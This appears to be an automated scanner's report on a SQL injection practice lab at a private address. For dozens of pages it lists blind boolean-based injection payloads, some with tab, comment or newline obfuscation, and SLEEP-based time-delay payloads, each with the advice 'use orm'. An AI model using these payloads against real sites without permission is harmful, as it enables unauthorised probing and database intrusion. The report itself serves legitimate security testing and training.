Target: http://192.168.42.133 (GET)

---
URL:http://192.168.42.133/sqli/example1.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example4.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	64947=64947
	and	24393=24393
	or	93906=93906#
	and	78552=78553
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example3.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '/**/and/**/'84957'='84957
'/**/and/**/'9404'='9404
'/**/or/**/69964=69964#
'/**/and/**/'97742'='97743
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example5.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	64947=64947
	and	24393=24393
	or	93906=93906#
	and	78552=78553
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example6.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	64947=64947
	and	24393=24393
	or	93906=93906#
	and	78552=78553
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example7.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 
and
92370=92370

and
60180=60180

or
81885=81885#

and
50707=50708
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/xml/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'hacker'}
Payload: '+and+'17259'='17259
'+and+'28596'='28596
'+or+20036=20036#
'+and+'43247'='43248
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example101.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example100.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example102.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example103.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example104.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example105.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example106.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example107.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example108.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example109.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example110.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example111.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example114.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example112.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example113.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example115.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example116.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example117.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example118.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example119.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example120.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example121.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example122.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example123.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example125.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example124.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example126.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example127.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example128.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example129.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example131.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example130.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example133.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example132.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example134.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example136.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example135.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example138.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example137.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example139.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example141.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example140.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'42915'='42915
'	and	'65332'='65332
'	or	446=446#
'	and	'31795'='31796
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example9.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload:  or SLEEP(3);-- 
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example8.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload: ` or SLEEP(3);-- 
Advice: use orm
Database: unknown
---